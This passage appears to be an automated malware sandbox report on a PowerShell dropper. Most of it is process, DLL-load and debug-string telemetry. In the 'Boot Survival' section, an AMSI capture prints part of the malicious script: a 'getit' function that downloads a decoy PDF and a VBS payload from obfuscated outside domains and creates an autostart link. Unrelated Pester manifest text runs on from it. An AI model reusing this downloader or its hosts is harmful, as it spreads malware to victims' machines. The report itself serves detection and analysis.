      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1736,i,1938861957224451301,13168527261703212553,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A01C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: scorlib.pdb_2 source: powershell.exe, 00000000.00000002.1514778693.00000198A01C4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1314807939.000001FC4F31E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb] source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb3 source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdbre source: powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: tomation.pdbt source: powershell.exe, 00000000.00000002.1512207597.000001989FDD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbX source: powershell.exe, 00000000.00000002.1431423233.0000019885E42000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dbpdbtem.pdbA source: powershell.exe, 00000000.00000002.1512207597.000001989FDD0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1514778693.00000198A011C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000003.00000002.1317790097.000001FC4F6FC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32D4X source: powershell.exe, 00000003.00000002.1315883159.000001FC4F59A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbw} source: powershell.exe, 00000000.00000002.1514778693.00000198A0180000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdb source: powershell.exe, 00000000.00000002.1431423233.0000019885EB6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ?/n.pdb source: powershell.exe, 00000003.00000002.1315104951.000001FC4F36D000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC5700BD pushad ; iretd 3_2_00007FFAAC5700C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFAAC640D6C push eax; ret 3_2_00007FFAAC640D6D

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'hte4iwww.astishntishrprisishs.com.pk/ms/List%20of%20rishquirishd%20itishms%20and%20sishrvicishs.pdf';getit -fz $flol -oulv 'http://www.bluishmaxxlasishr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
